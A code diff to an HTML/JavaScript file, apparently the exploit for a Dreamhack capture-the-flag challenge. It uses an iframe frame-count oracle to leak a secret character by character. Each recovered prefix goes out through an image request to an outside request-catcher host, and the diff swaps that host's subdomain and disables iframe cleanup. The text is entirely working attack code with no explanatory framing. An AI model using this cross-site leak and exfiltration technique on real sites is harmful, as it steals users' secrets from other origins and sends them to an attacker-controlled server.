--- a/static/js/test.html
+++ b/static/js/test.html
@@ -19,18 +19,18 @@
             iframe.onload = () => {
                 try {
                     let result = iframe.contentWindow.frames.length;
-                    removeIframe();
+                    //removeIframe();
                     resolve(result > 0);
                 } catch (e) {
-                    removeIframe();
+                    //removeIframe();
                     resolve(false);
                 }
             };
 
             setTimeout(() => {
-                removeIframe();
+                //removeIframe();
                 resolve(false);
-            }, 1000); // 1초 타임아웃 설정
+            }, 1000);
         });
     }
 
@@ -50,13 +50,13 @@
                 if (rslt.success) {
                     secret += rslt.char;
                     found = true;
-                    img.src = `https://oczkhvm.request.dreamhack.games/${secret}`;
+                    img.src = `https://qjoyjis.request.dreamhack.games/${secret}`;
                     break;
                 }
             }
 
             if (!found) {
-                img.src = `https://oczkhvm.request.dreamhack.games/failed`;
+                img.src = `https://qjoyjis.request.dreamhack.games/failed`;
                 throw new Error("Not found");
             }
         }
